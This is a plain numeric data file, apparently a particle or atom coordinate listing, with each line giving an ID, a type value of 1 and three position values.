2007 1 0.328873 0.0511941 0.0614525
2020 1 0.175924 0.874578 0.0413618
286 1 0.334971 0.139784 0.0605486
1921 1 0.396777 0.198617 0.0745315
1739 1 0.211912 0.474144 0.0915819
1972 1 0.0421847 0.511235 0.0653837
819 1 0.430911 0.658183 0.0031257
1255 1 0.268811 0.61475 0.0763736
847 1 0.150419 0.859824 0.119958
828 1 0.145757 0.105908 0.125015
57 1 0.252661 0.0417618 0.145794
935 1 0.0613449 0.366338 0.2974
1736 1 0.140288 0.10321 0.0721049
523 1 0.368268 0.120762 0.125353
349 1 0.287036 0.199538 0.0987159
999 1 0.111888 0.204367 0.121103
1041 1 0.144106 0.227221 0.106075
367 1 0.39423 0.251122 0.0957009
990 1 0.220114 0.532236 0.146679
75 1 0.203916 0.619211 0.148254
2039 1 0.228956 0.600568 0.108192
598 1 0.337098 0.581976 0.179691
1752 1 0.212564 0.617934 0.0595027
1010 1 0.215608 0.953508 0.0631212
1423 1 0.173915 0.886005 0.0735061
1456 1 0.167978 0.990925 0.0999368
131 1 0.291659 0.00478229 0.118307
1814 1 0.414588 0.059507 0.124688
934 1 0.455809 0.207045 0.134106
54 1 0.307814 0.25446 0.111489
1171 1 0.341195 0.243955 0.0963918
296 1 0.166804 0.231513 0.0628734
1989 1 0.142834 0.397744 0.046422
1409 1 0.475692 0.362798 0.121996
979 1 0.296771 0.381821 0.16531
1801 1 0.243038 0.684659 0.127236
803 1 0.0375468 0.79897 0.109506
1068 1 0.0280234 0.694137 0.102039
588 1 0.103332 0.859955 0.131069
246 1 0.322039 0.783471 0.154622
1791 1 0.476717 0.763361 0.0766634
1591 1 0.0351221 0.902629 0.13908
732 1 0.496 0.990014 0.154849
1419 1 0.0298796 0.104531 0.113718
283 1 0.350608 0.0610425 0.152123
801 1 0.489552 0.103231 0.0614007
1603 1 0.49165 0.104771 0.234279
64 1 0.278049 0.167731 0.116236
337 1 0.218591 0.203511 0.161717
1948 1 0.245367 0.211708 0.100104
1198 1 0.16051 0.247058 0.0681249
1361 1 0.254438 0.368092 0.115033
696 1 0.232523 0.277282 0.0839882
1857 1 0.00201156 0.482902 0.0353738
804 1 0.384874 0.512454 0.187665
1934 1 0.181855 0.587681 0.122881
898 1 0.210055 0.660108 0.11797
1064 1 0.382512 0.701997 0.183554
1621 1 0.082407 0.710436 0.152963
1802 1 0.463799 0.234425 0.195155
890 1 0.187914 0.725909 0.184372
799 1 0.474491 0.828521 0.11849
510 1 0.257146 0.789809 0.137138
2003 1 0.223705 0.0650647 0.123883
742 1 0.20257 0.0374835 0.136775
827 1 0.486963 0.217917 0.123717
335 1 0.462276 0.249636 0.195458
312 1 0.204236 0.328121 0.139798
1009 1 0.475361 0.438649 0.173553
393 1 0.483151 0.411695 0.428994
519 1 0.0354957 0.492201 0.0190766
978 1 0.278371 0.514994 0.132794
128 1 0.0213043 0.605929 0.135764
1576 1 0.260636 0.70597 0.131173
1427 1 0.0975198 0.656824 0.149725
1069 1 0.496016 0.705775 0.137107
1774 1 0.350197 0.760013 0.108357
141 1 0.0230141 0.78496 0.161063
1372 1 0.357193 0.911054 0.197259
1049 1 0.125809 0.478266 0.494018
90 1 0.410185 0.980213 0.183606
1751 1 0.408538 0.948124 0.136416
959 1 0.25435 0.101926 0.123472
1892 1 0.448123 0.246452 0.167684
1983 1 0.172614 0.226847 0.235196
1713 1 0.362758 0.245354 0.16963
1755 1 0.219536 0.307502 0.13533
697 1 0.0135356 0.382243 0.141607
458 1 0.192553 0.412154 0.214511
301 1 0.0251029 0.472135 0.123782
1287 1 0.410446 0.430317 0.168993
38 1 0.326204 0.633668 0.240914
1734 1 0.374546 0.828339 0.177965
1770 1 0.143631 0.887897 0.154348
517 1 0.4054 0.897168 0.159219
436 1 0.416867 0.987691 0.105251
1240 1 0.171831 0.397068 0.192128
1360 1 0.0948884 0.42662 0.146298
1611 1 0.307309 0.604503 0.210533
1635 1 0.387262 0.612676 0.222202
633 1 0.149991 0.744744 0.181948
1048 1 0.31072 0.768774 0.159634
783 1 0.24499 0.761594 0.167123
386 1 0.412469 0.843845 0.174269
1695 1 0.252071 0.908955 0.154697
407 1 0.178746 0.872275 0.183631
730 1 0.255282 0.935206 0.213184
639 1 0.339017 0.978591 0.200072
354 1 0.410292 0.00483246 0.16236
115 1 0.0726209 0.132155 0.219405
136 1 0.0842741 0.162517 0.172557
1907 1 0.362979 0.162882 0.155634
1288 1 0.210589 0.292768 0.21484
1687 1 0.45758 0.31806 0.232389
1730 1 0.201031 0.439812 0.239022
380 1 0.417228 0.363969 0.16714
1499 1 0.191648 0.520881 0.263399
1555 1 0.194606 0.412275 0.168027
551 1 0.197013 0.460066 0.142363
177 1 0.455964 0.569171 0.188354
212 1 0.419295 0.594004 0.175483
2043 1 0.104028 0.788164 0.226802
224 1 0.0305296 0.580287 0.0483228
945 1 0.365197 0.0721687 0.273144
1475 1 0.0716654 0.268657 0.220978
1376 1 0.265758 0.391921 0.195865
414 1 0.0733191 0.439118 0.210596
1061 1 0.303217 0.523671 0.289684
622 1 0.0303368 0.514135 0.267006
865 1 0.110945 0.57733 0.227807
686 1 0.372595 0.624716 0.217591
638 1 0.402446 0.629599 0.159869
1901 1 0.126168 0.721607 0.275107
439 1 0.399628 0.7958 0.28393
1459 1 0.0586382 0.708517 0.271443
623 1 0.070772 0.0457597 0.227425
1448 1 0.481714 0.0542218 0.274377
532 1 0.383734 0.130027 0.219777
52 1 0.370191 0.210011 0.196736
41 1 0.0101612 0.412566 0.235495
1548 1 0.442888 0.437633 0.220393
904 1 0.332107 0.500717 0.210143
1051 1 0.0201901 0.632153 0.266555
1835 1 0.139841 0.58549 0.232966
838 1 0.0862027 0.673752 0.248271
806 1 0.0540841 0.835922 0.259874
411 1 0.136266 0.789767 0.230342
1903 1 0.428903 0.94145 0.205563
1891 1 0.359578 0.00906107 0.270602
1387 1 0.26934 0.907592 0.226006
80 1 0.157184 0.045788 0.237238
710 1 0.381109 0.0959277 0.285456
1937 1 0.0404846 0.9277 0.250232
25 1 0.068248 0.149948 0.25696
384 1 0.167475 0.245264 0.285823
1685 1 0.252031 0.242209 0.325189
1117 1 0.317416 0.282394 0.232111
1897 1 0.156388 0.248787 0.25986
434 1 0.281391 0.307975 0.228283
1276 1 0.192113 0.391867 0.3052
1225 1 0.455947 0.378534 0.253817
1804 1 0.0269152 0.550257 0.188152
682 1 0.0685354 0.562819 0.250378
9 1 0.213665 0.609629 0.246597
1370 1 0.453537 0.640311 0.239554
1004 1 0.00899983 0.800977 0.373373
899 1 0.204944 0.713766 0.235291
1938 1 0.189402 0.713122 0.296495
1620 1 0.398575 0.72798 0.254959
399 1 0.189968 0.862042 0.331298
911 1 0.233506 0.804582 0.303305
1303 1 0.280828 0.844608 0.221001
1232 1 0.294169 0.0455183 0.315117
1500 1 0.389913 0.179908 0.289597
336 1 0.0526601 0.209331 0.288247
918 1 0.499212 0.266768 0.312688
1135 1 0.196374 0.301399 0.31905
1723 1 0.421108 0.392077 0.296091
1152 1 0.478835 0.291972 0.339199
358 1 0.175579 0.436065 0.268415
1613 1 0.368394 0.452212 0.368237
1652 1 0.184324 0.499877 0.293167
661 1 0.242499 0.467903 0.271274
1464 1 0.315062 0.479907 0.259542
648 1 0.300466 0.527824 0.315741
1862 1 0.434984 0.606773 0.236305
1168 1 0.0505286 0.68446 0.299506
1091 1 0.128732 0.683501 0.219249
540 1 0.469548 0.70414 0.29227
92 1 0.0314395 0.762656 0.258411
735 1 0.00458943 0.221658 0.0717067
1553 1 0.135424 0.734383 0.262607
351 1 0.467844 0.712852 0.496551
1545 1 0.416739 0.810721 0.245969
213 1 0.150471 0.965053 0.250676
1309 1 0.3084 0.0392873 0.227226
1898 1 0.477694 0.27051 0.00267658
917 1 0.0858888 0.10184 0.281827
165 1 0.0167119 0.0802055 0.344821
991 1 0.392318 0.202197 0.232912
625 1 0.199317 0.233438 0.319547
473 1 0.430141 0.236754 0.282995
377 1 0.471786 0.36224 0.250058
144 1 0.325587 0.503512 0.254639
745 1 0.0301458 0.53519 0.317905
1870 1 0.0301738 0.623332 0.314813
775 1 0.164105 0.569984 0.319441
1104 1 0.420935 0.678022 0.312439
1 1 0.169923 0.762261 0.292211
1452 1 0.332274 0.811604 0.260945
282 1 0.0758049 0.874241 0.30772
786 1 0.432476 0.899696 0.308981
1845 1 0.384973 0.986684 0.262145
429 1 0.391965 0.910146 0.244719
1668 1 0.248589 0.15718 0.299814
388 1 0.0292265 0.193507 0.314691
823 1 0.0206969 0.231179 0.262366
345 1 0.185067 0.342163 0.328951
1142 1 0.217287 0.425557 0.333946
550 1 0.262992 0.48466 0.0182318
265 1 0.179771 0.565952 0.340109
316 1 0.148036 0.594855 0.286328
906 1 0.395852 0.559434 0.315701
1610 1 0.0154996 0.640297 0.303827
624 1 0.405902 0.669195 0.295556
1378 1 0.439568 0.641965 0.296134
2029 1 0.0365666 0.733523 0.301341
1985 1 0.286746 0.756477 0.2749
16 1 0.0252568 0.669262 0.310986
107 1 0.379702 0.744755 0.366493
1957 1 0.0413425 0.982436 0.338
19 1 0.341457 0.978368 0.335995
1028 1 0.023804 0.982234 0.332377
687 1 0.48182 0.987811 0.359417
1417 1 3.05626e-06 0.199417 0.299685
1241 1 0.218988 0.240822 0.328148
44 1 0.476119 0.706563 0.12492
614 1 0.355685 0.302601 0.302335
1785 1 0.0319365 0.30934 0.398108
1820 1 0.0384968 0.312576 0.392003
1925 1 0.157534 0.486324 0.313948
1454 1 0.16618 0.474551 0.306635
689 1 0.0491713 0.462788 0.315865
1421 1 0.11062 0.478041 0.378147
37 1 0.0442659 0.610449 0.296286
1675 1 0.354852 0.608745 0.35683
452 1 0.395863 0.667026 0.34676
1149 1 0.151581 0.746402 0.328973
1626 1 0.0278542 0.598071 0.371504
1290 1 0.294184 0.113498 0.387153
731 1 0.25763 0.163815 0.424568
1012 1 0.401722 0.165685 0.356425
563 1 0.475337 0.270842 0.350199
471 1 0.244811 0.336756 0.371957
1474 1 0.345977 0.338868 0.318243
736 1 0.479147 0.342823 0.291617
330 1 0.335958 0.331053 0.322762
1060 1 0.367552 0.462594 0.38269
1330 1 0.364133 0.572966 0.325259
989 1 0.205399 0.558073 0.37647
1003 1 0.0917776 0.567173 0.311528
1267 1 0.468397 0.750434 0.382602
589 1 0.355575 0.777656 0.411985
739 1 0.11361 0.88466 0.331768
971 1 0.429584 0.0695142 0.309158
1436 1 0.39449 0.241376 0.265252
43 1 0.409235 0.218622 0.318956
1045 1 0.100175 0.344368 0.38175
1679 1 0.348165 0.396903 0.349897
1258 1 0.434341 0.548779 0.335624
1014 1 0.280162 0.460968 0.347286
373 1 0.356559 0.592456 0.424358
7 1 0.223046 0.58095 0.342753
474 1 0.476287 0.820923 0.300868
1200 1 0.130121 0.620873 0.385992
1189 1 0.277889 0.581689 0.461306
1954 1 0.246432 0.623951 0.326294
334 1 0.275899 0.596946 0.375267
912 1 0.427773 0.637893 0.383085
1961 1 0.396055 0.612736 0.380795
724 1 0.38041 0.626966 0.313744
599 1 0.20599 0.634341 0.331199
1684 1 0.469134 0.694236 0.348259
1206 1 0.234975 0.785005 0.450621
324 1 0.192032 0.927934 0.356178
976 1 0.435436 0.0530023 0.326717
1598 1 0.472651 0.639495 0.0463557
953 1 0.0700598 0.097351 0.361457
133 1 0.417237 0.210971 0.383511
1248 1 0.200073 0.263546 0.402211
1366 1 0.242371 0.321279 0.396918
1266 1 0.303009 0.379062 0.407965
1254 1 0.262901 0.208853 0.00427637
946 1 0.0628226 0.614116 0.375636
258 1 0.492975 0.619727 0.419579
1706 1 0.424946 0.631767 0.411602
1503 1 0.0452291 0.719016 0.413476
82 1 0.370393 0.653753 0.413684
1838 1 0.493014 0.0271013 0.331531
1401 1 0.283916 0.881683 0.337942
1681 1 0.118429 0.870164 0.377669
872 1 0.132866 0.851729 0.342345
1087 1 0.111023 0.877425 0.377683
1016 1 0.2168 0.935225 0.370311
1277 1 0.325718 0.00672681 0.327463
1451 1 0.148104 0.0957204 0.372592
1710 1 0.0811612 0.0984651 0.406709
1876 1 0.0900272 0.315791 0.418964
856 1 0.288224 0.312313 0.394234
881 1 0.253817 0.348449 0.472624
120 1 0.298555 0.300556 0.399371
1438 1 0.450053 0.359121 0.391934
1931 1 0.246665 0.535203 0.382076
1365 1 0.400138 0.566565 0.373528
859 1 0.370345 0.584831 0.339064
1146 1 0.266274 0.605926 0.433999
855 1 0.433001 0.679303 0.402795
1651 1 0.123911 0.670658 0.406697
1496 1 0.450104 0.709634 0.363823
478 1 0.347141 0.753975 0.435126
104 1 0.0673676 0.746821 0.426909
182 1 0.473575 0.083692 0.133106
1193 1 0.441612 0.783816 0.461135
1302 1 0.390232 0.841942 0.36799
31 1 0.0767624 0.826774 0.485927
262 1 0.329054 0.865054 0.435712
1052 1 0.301655 0.900308 0.393007
1406 1 0.331333 0.845576 0.346242
1701 1 0.273964 0.992659 0.444049
660 1 0.321341 0.0610026 0.459119
829 1 0.358021 0.0491765 0.419241
2041 1 0.099539 0.191541 0.410223
381 1 0.196661 0.162413 0.480581
1222 1 0.10542 0.193055 0.432297
1833 1 0.0911186 0.256984 0.440255
512 1 0.319694 0.306157 0.435844
416 1 0.479036 0.336904 0.431982
378 1 0.495191 0.486943 0.358213
207 1 0.250317 0.428642 0.40325
223 1 0.00994319 0.389766 0.369393
1772 1 0.235767 0.698162 0.374621
1328 1 0.287111 0.640747 0.459785
222 1 0.0696922 0.708902 0.457999
1756 1 0.147388 0.764764 0.342701
45 1 0.0967312 0.819359 0.432303
1099 1 0.0806426 0.917562 0.403719
1273 1 0.340343 0.851331 0.430257
505 1 0.384616 0.969322 0.409269
1005 1 0.388406 0.970895 0.381974
972 1 0.425313 0.0035767 0.423406
1382 1 0.0438197 0.0933111 0.468718
1807 1 0.254264 0.107205 0.487406
816 1 0.100685 0.143666 0.42238
950 1 0.42125 0.16522 0.463431
143 1 0.0303975 0.177395 0.418736
869 1 0.159302 0.218041 0.416917
1211 1 0.385255 0.36292 0.424539
1511 1 0.0818737 0.320923 0.464076
1778 1 0.358755 0.420669 0.484179
668 1 0.467795 0.335344 0.437762
1573 1 0.319206 0.488987 0.448963
1973 1 0.329568 0.482529 0.46113
996 1 0.0973354 0.459029 0.419228
468 1 0.407527 0.462237 0.454089
1363 1 0.470806 0.52662 0.457229
1407 1 0.0465348 0.639683 0.468311
124 1 0.19003 0.782176 0.420518
1073 1 0.188445 0.715633 0.406874
1327 1 0.49824 0.945584 0.0449227
372 1 0.422291 0.995216 0.443966
2000 1 0.210524 0.111494 0.45308
371 1 0.320445 0.118179 0.477676
1289 1 0.316083 0.166092 0.472498
109 1 0.25292 0.195628 0.439953
1185 1 0.168952 0.196686 0.4488
1860 1 0.0129194 0.228778 0.403501
1763 1 0.142834 0.482818 0.437505
1163 1 0.412964 0.480989 0.452352
595 1 0.384448 0.498288 0.398649
684 1 0.241682 0.141203 0.0137176
307 1 0.408225 0.678387 0.414477
702 1 0.21141 0.798901 0.44521
1393 1 0.0820524 0.126792 0.467176
15 1 0.144607 0.94488 0.492375
1963 1 0.120846 0.245938 0.474675
794 1 0.111424 0.197367 0.470655
631 1 0.480748 0.0132546 0.034003
1044 1 0.459541 0.311133 0.48398
666 1 0.153549 0.438427 0.491716
192 1 0.481313 0.327725 0.409381
1011 1 0.0235655 0.292214 0.308389
600 1 0.10425 0.747197 0.0290785
621 1 0.484275 0.884174 0.00901414
1383 1 0.225147 0.77953 0.466646
833 1 0.240609 0.182061 0.00589966
1283 1 0.318839 0.764083 0.451554
1968 1 0.463627 0.798795 0.488424
849 1 0.156704 0.910919 0.478252
1886 1 0.274323 0.917244 0.41965
1935 1 0.349093 0.938071 0.465272
110 1 0.0173793 0.674093 0.317185
670 1 0.16612 0.190193 0.424589
453 1 0.40823 0.185041 0.485556
2044 1 0.03883 0.978838 0.490595
148 1 0.261807 0.333556 0.0137695
818 1 0.358729 0.290023 0.448267
227 1 0.189423 0.361566 0.42961
1749 1 0.289734 0.440618 0.472219
870 1 0.00731032 0.447724 0.140959
1920 1 0.484384 0.725848 0.456255
1477 1 0.385884 0.292508 0.468483
1817 1 0.223615 0.764145 0.463556
279 1 0.447728 0.849595 0.351908
48 1 0.147824 0.478992 0.0642091
1666 1 0.445667 0.719204 0.048945
1084 1 0.370388 0.0459942 0.0195484
1677 1 0.0308556 0.127595 0.491912
642 1 0.00269022 0.261382 0.389449
575 1 0.0764842 0.280944 0.592168
677 1 0.258916 0.999852 0.557436
733 1 0.167467 0.111148 0.527089
423 1 0.490033 0.338344 0.66445
1757 1 0.233121 0.306521 0.530378
1281 1 0.302115 0.309053 0.503703
1070 1 0.255369 0.430037 0.557261
1949 1 0.0326253 0.848204 0.757488
28 1 0.459647 0.743405 0.935253
812 1 0.371776 0.694614 0.523987
936 1 0.485175 0.107116 0.647719
669 1 0.348864 0.431977 0.526193
130 1 0.232444 0.196914 0.520757
559 1 0.108167 0.280377 0.536474
1880 1 0.406092 0.301286 0.56519
1654 1 0.0722855 0.387872 0.540241
1727 1 0.271372 0.379115 0.54063
2045 1 0.0103312 0.401277 0.518723
1186 1 0.493451 0.623336 0.890184
2040 1 0.0750013 0.629953 0.532886
440 1 0.401348 0.645852 0.56444
529 1 0.382455 0.828904 0.992599
1625 1 0.0602854 0.713688 0.554722
187 1 0.203713 0.817572 0.569742
2001 1 0.0258309 0.154666 0.628625
2035 1 0.25445 0.951646 0.509672
1990 1 0.0983837 0.0205114 0.566296
194 1 0.250485 0.201579 0.575489
1581 1 0.359685 0.148187 0.525097
464 1 0.00509045 0.0602321 0.941465
77 1 0.287565 0.321903 0.544631
558 1 0.00323527 0.332022 0.545256
737 1 0.229703 0.388547 0.620307
443 1 0.44385 0.415132 0.539671
1623 1 0.0308288 0.462322 0.533331
1847 1 0.477385 0.497897 0.505882
698 1 0.0385713 0.57957 0.51167
1784 1 0.255055 0.491678 0.559928
1533 1 0.0942919 0.53195 0.999457
469 1 0.175055 0.851761 0.561886
1994 1 0.332638 0.900544 0.565187
295 1 0.446438 0.938246 0.530188
1780 1 0.340802 0.0365339 0.540651
820 1 0.425992 0.988185 0.576573
1535 1 0.344219 0.631867 0.502751
2047 1 0.290333 0.968128 0.528069
844 1 0.436703 0.0155862 0.605087
632 1 0.297231 0.16209 0.559184
197 1 0.229038 0.892999 0.526991
643 1 0.387287 0.260911 0.586142
1323 1 0.0461626 0.304184 0.535757
1629 1 0.0985234 0.276483 0.594469
772 1 0.368458 0.32399 0.580252
1958 1 0.232314 0.431981 0.538976
620 1 0.415712 0.3994 0.559278
342 1 0.168949 0.51713 0.56647
14 1 0.304448 0.541099 0.608928
1707 1 0.348933 0.537653 0.513796
288 1 0.0532734 0.76586 0.937893
1512 1 0.0555424 0.662249 0.54309
361 1 0.442549 0.695828 0.565884
285 1 0.193517 0.716858 0.570757
1233 1 0.232378 0.833549 0.559676
524 1 0.101242 0.962658 0.575465
1976 1 0.27509 0.00226648 0.534603
2011 1 0.0830891 0.103193 0.629067
674 1 0.0890698 0.15318 0.566655
441 1 0.257773 0.188392 0.557734
1534 1 0.368997 0.122727 0.554203
1209 1 0.0769102 0.142522 0.539075
1518 1 0.475596 0.208004 0.767116
1683 1 0.408084 0.516672 0.564892
123 1 0.00978157 0.552974 0.571235
692 1 0.0809418 0.560267 0.652919
1866 1 0.303976 0.582289 0.535541
174 1 0.0239376 0.609317 0.611065
278 1 0.454934 0.851989 0.852332
178 1 0.221643 0.878809 0.991839
874 1 0.392597 0.830339 0.541217
1062 1 0.395693 0.821409 0.644282
1134 1 0.413873 0.895503 0.587731
701 1 0.203394 0.89368 0.552897
176 1 0.217224 0.950823 0.504944
815 1 0.0831457 0.0251029 0.615637
465 1 0.359611 0.0959289 0.55355
164 1 0.346805 0.0422413 0.526077
186 1 0.0306404 0.0844708 0.620187
402 1 0.462483 0.118645 0.645117
581 1 0.160867 0.269514 0.614654
2038 1 0.251284 0.210761 0.58008
1849 1 0.250311 0.266604 0.618892
76 1 0.247429 0.334208 0.606693
1405 1 0.330818 0.33349 0.589582
1418 1 0.354837 0.491963 0.638721
1457 1 0.180838 0.454491 0.617916
1037 1 0.0816751 0.498908 0.577589
225 1 0.153731 0.527458 0.546648
915 1 0.120012 0.564264 0.541671
1371 1 0.429173 0.599877 0.619924
389 1 0.310881 0.733032 0.616665
1863 1 0.346649 0.808093 0.515256
183 1 0.401644 0.833267 0.632713
1722 1 0.481295 0.849458 0.615522
410 1 0.430523 0.0439471 0.588604
1324 1 0.188003 0.195651 0.649081
720 1 0.381143 0.381316 0.621459
204 1 0.439256 0.537644 0.638844
937 1 0.275921 0.567302 0.615149
1093 1 0.355676 0.52991 0.651528
56 1 0.0219862 0.660081 0.6472
102 1 0.44403 0.636679 0.594965
835 1 0.0419238 0.706334 0.558835
886 1 0.139141 0.654555 0.569087
578 1 0.287021 0.682637 0.618867
567 1 0.31804 0.672968 0.632863
70 1 0.204278 0.701479 0.60969
156 1 0.216891 0.729048 0.61682
516 1 0.081506 0.826451 0.60854
1155 1 0.3758 0.864571 0.615074
586 1 0.283426 0.957194 0.614501
527 1 0.160549 0.959446 0.584999
714 1 0.147087 0.0543794 0.667434
171 1 0.295 0.0134993 0.669187
1345 1 0.161322 0.0698578 0.624961
1858 1 0.275639 0.168935 0.698778
868 1 0.499287 0.698393 0.995867
1552 1 0.196141 0.228275 0.637245
491 1 0.334046 0.209448 0.64741
839 1 0.293447 0.310482 0.594277
1413 1 0.311901 0.370389 0.628615
543 1 0.177133 0.403629 0.624317
303 1 0.35714 0.341041 0.630054
364 1 0.331183 0.470557 0.630004
1604 1 0.114704 0.523692 0.685931
339 1 0.331598 0.529501 0.585111
811 1 0.147939 0.837645 0.506564
1559 1 0.138319 0.493678 0.573609
1844 1 0.457249 0.581763 0.604818
1493 1 0.0747355 0.599541 0.662311
1530 1 0.264678 0.711429 0.649702
1761 1 0.0829431 0.787661 0.59818
877 1 0.00610587 0.815162 0.653731
310 1 0.420488 0.790892 0.671164
1440 1 0.176081 0.843056 0.597543
1959 1 0.354845 0.922358 0.636817
857 1 0.391262 0.863161 0.599113
1318 1 0.137091 0.788512 0.619329
1034 1 0.121841 0.953615 0.620204
1532 1 0.486006 0.918283 0.634756
1748 1 0.126388 0.0283147 0.641356
940 1 0.0478688 0.0728403 0.585251
530 1 0.143583 0.203421 0.614232
1075 1 0.280253 0.25926 0.658415
1619 1 0.291478 0.377709 0.635579
65 1 0.094613 0.295871 0.667777
539 1 0.212659 0.35223 0.659043
94 1 0.199541 0.321512 0.628622
1210 1 0.0758591 0.527059 0.606342
747 1 0.465205 0.695308 0.714319
944 1 0.456635 0.685661 0.647102
921 1 0.125294 0.781093 0.638783
1145 1 0.450325 0.741315 0.685254
365 1 0.339064 0.832137 0.635562
805 1 0.22084 0.920044 0.707094
895 1 0.181483 0.962592 0.68719
1278 1 0.200743 0.0486295 0.645233
196 1 0.365838 0.04829 0.641902
42 1 0.392047 0.970318 0.74936
852 1 0.302988 0.0374374 0.6257
442 1 0.480021 0.712892 0.98733
864 1 0.464701 0.317573 0.619343
1243 1 0.162602 0.282627 0.61052
923 1 0.406317 0.231432 0.650619
484 1 0.276613 0.366452 0.739368
994 1 0.161524 0.51628 0.704595
518 1 0.0316675 0.533842 0.668252
2022 1 0.221601 0.45885 0.614641
1584 1 0.48845 0.469327 0.710002
50 1 0.141506 0.499824 0.688194
1558 1 0.12041 0.465086 0.697316
1362 1 0.333099 0.50467 0.659252
1184 1 0.0438038 0.581108 0.672189
884 1 0.336466 0.607653 0.671653
1389 1 0.397072 0.73573 0.627524
866 1 0.101469 0.774712 0.618495
998 1 0.187259 0.90165 0.679542
1274 1 0.395125 0.0353185 0.714855
1665 1 0.104674 0.128742 0.671448
1811 1 0.269216 0.152849 0.736838
40 1 0.0383183 0.283277 0.709809
1557 1 0.169295 0.16375 0.669311
1607 1 0.356236 0.35288 0.669227
1291 1 0.191695 0.303131 0.755357
1388 1 0.168784 0.474763 0.626949
1795 1 0.113574 0.628087 0.720804
172 1 0.0147463 0.577182 0.653082
1458 1 0.0580629 0.622163 0.710272
1952 1 0.378354 0.872128 0.666119
1630 1 0.0969104 0.949797 0.665334
709 1 0.322404 0.935989 0.705065
1840 1 0.298411 0.964006 0.72396
824 1 0.102816 0.176025 0.700663
1692 1 0.21707 0.25539 0.710488
348 1 0.457688 0.772372 0.878956
594 1 0.211424 0.361143 0.720376
646 1 0.105146 0.417151 0.67975
1133 1 0.32991 0.395368 0.766297
1826 1 0.340202 0.651844 0.712184
1593 1 0.331159 0.551118 0.648925
580 1 0.46068 0.669385 0.727918
2010 1 0.377923 0.638108 0.766232
1562 1 0.0269229 0.670267 0.72594
1408 1 0.356524 0.737833 0.748946
1138 1 0.268147 0.781351 0.671383
541 1 0.271304 0.898541 0.711815
1334 1 0.388176 0.845708 0.751552
553 1 0.381234 0.0235798 0.68285
716 1 0.0300912 0.987658 0.695209
965 1 0.13399 0.152286 0.703564
368 1 0.467447 0.09234 0.736396
888 1 0.451335 0.216424 0.74296
1966 1 0.490821 0.176652 0.749565
419 1 0.122983 0.187645 0.686638
506 1 0.421192 0.256402 0.930577
513 1 0.102372 0.279315 0.673126
1175 1 0.38522 0.273825 0.768716
360 1 0.178406 0.412813 0.788099
1213 1 0.372502 0.407359 0.701781
1631 1 0.267787 0.461191 0.770732
425 1 0.320403 0.37588 0.672399
1871 1 0.114741 0.489915 0.753324
779 1 0.182294 0.482413 0.713699
1272 1 0.271083 0.463108 0.677407
2019 1 0.176604 0.574101 0.72174
1671 1 0.156601 0.610332 0.692668
1239 1 0.234199 0.551294 0.587242
1759 1 0.468797 0.549076 0.892668
545 1 0.368095 0.659667 0.733593
327 1 0.0432991 0.757705 0.704694
1308 1 0.330308 0.692175 0.657689
1480 1 0.202437 0.731289 0.707639
1042 1 0.11528 0.785463 0.711581
1538 1 0.141292 0.800946 0.807078
1946 1 0.0597151 0.778448 0.716405
1079 1 0.119783 0.740172 0.781644
1788 1 0.207723 0.809437 0.80232
1818 1 0.022029 0.811417 0.731203
1979 1 0.27478 0.878764 0.73674
1912 1 0.114841 0.839539 0.729329
106 1 0.190723 0.907828 0.755323
2021 1 0.488527 0.0258643 0.757282
325 1 0.210689 0.984991 0.688651
253 1 0.36058 0.0124914 0.729347
704 1 0.0257161 0.113707 0.711703
746 1 0.426882 0.0989511 0.735536
681 1 0.0402183 0.121134 0.760108
1615 1 0.234117 0.188245 0.696735
185 1 0.397671 0.0550492 0.672841
1183 1 0.0999174 0.114625 0.74779
1790 1 0.221087 0.179253 0.771498
1095 1 0.258602 0.425753 0.502096
2042 1 0.264062 0.322045 0.812344
126 1 0.0281514 0.435036 0.783357
403 1 0.261219 0.351755 0.754713
1253 1 0.117159 0.427946 0.743961
2013 1 0.0174202 0.461155 0.695181
215 1 0.287822 0.541431 0.69389
166 1 0.261368 0.456195 0.7461
1086 1 0.365066 0.586774 0.707953
961 1 0.0627226 0.674536 0.720798
1482 1 0.132772 0.623948 0.651266
1429 1 0.306716 0.672846 0.835904
1280 1 0.208371 0.695393 0.73218
152 1 0.265192 0.76954 0.728073
409 1 0.0736518 0.827302 0.721708
1355 1 0.0249224 0.887429 0.695711
902 1 0.377955 0.940467 0.694038
1567 1 0.187687 0.95921 0.770099
1444 1 0.294716 0.974791 0.723387
1943 1 0.325088 0.0450068 0.78189
1669 1 0.348836 0.0919893 0.747681
1094 1 0.336693 0.235126 0.725722
1609 1 0.247946 0.269641 0.731464
252 1 0.482209 0.334466 0.752699
659 1 0.0804963 0.449807 0.776017
1638 1 0.00502934 0.125406 0.684546
1055 1 0.467726 0.67075 0.744962
461 1 0.230682 0.68746 0.785259
604 1 0.276783 0.759673 0.766349
690 1 0.300372 0.764336 0.769842
78 1 0.149176 0.835904 0.750951
1250 1 0.208903 0.949957 0.755785
125 1 0.145008 0.990317 0.701231
487 1 0.168877 0.170742 0.725149
952 1 0.0169291 0.19315 0.801361
318 1 0.0414231 0.284376 0.749816
1027 1 0.0731285 0.421607 0.855271
1465 1 0.23695 0.436579 0.788398
36 1 0.0619823 0.55807 0.72816
1637 1 0.329102 0.648386 0.819112
1798 1 0.309963 0.586334 0.771644
208 1 0.394629 0.692313 0.750525
776 1 0.437146 0.692081 0.766657
1074 1 0.213738 0.650508 0.696966
113 1 0.314254 0.757133 0.753682
346 1 0.371868 0.791655 0.798231
1868 1 0.21023 0.813976 0.81515
798 1 0.4346 0.823068 0.79027
328 1 0.316409 0.892823 0.831406
1262 1 0.172317 0.95639 0.722243
810 1 0.120036 0.921208 0.789295
55 1 0.213089 0.964584 0.778466
1356 1 0.315048 0.906871 0.791689
1890 1 0.0655119 0.986528 0.709717
734 1 0.417312 0.959601 0.74356
964 1 0.3786 0.0816329 0.762664
1691 1 0.330058 0.353284 0.779371
538 1 0.22414 0.478377 0.795027
1338 1 0.247306 0.446762 0.789265
680 1 0.406357 0.542078 0.767602
1335 1 0.122813 0.499221 0.868081
1805 1 0.491389 0.741838 0.62196
1199 1 0.489526 0.685517 0.742591
1848 1 0.421284 0.794692 0.819247
248 1 0.273576 0.924659 0.771594
924 1 0.103226 0.871098 0.851259
1659 1 0.427604 0.971345 0.784733
897 1 0.365461 0.025418 0.841418
636 1 0.378692 0.0288141 0.793192
350 1 0.269541 0.0916809 0.784467
1887 1 0.220999 0.120244 0.856654
1981 1 0.311752 0.22528 0.836285
1982 1 0.342623 0.17833 0.790487
1036 1 0.357099 0.248322 0.792214
880 1 0.0207768 0.342297 0.848148
1923 1 0.0447118 0.573661 0.831809
1597 1 0.0494718 0.674476 0.769581
1836 1 0.475571 0.900367 0.868996
338 1 0.119223 0.775814 0.81681
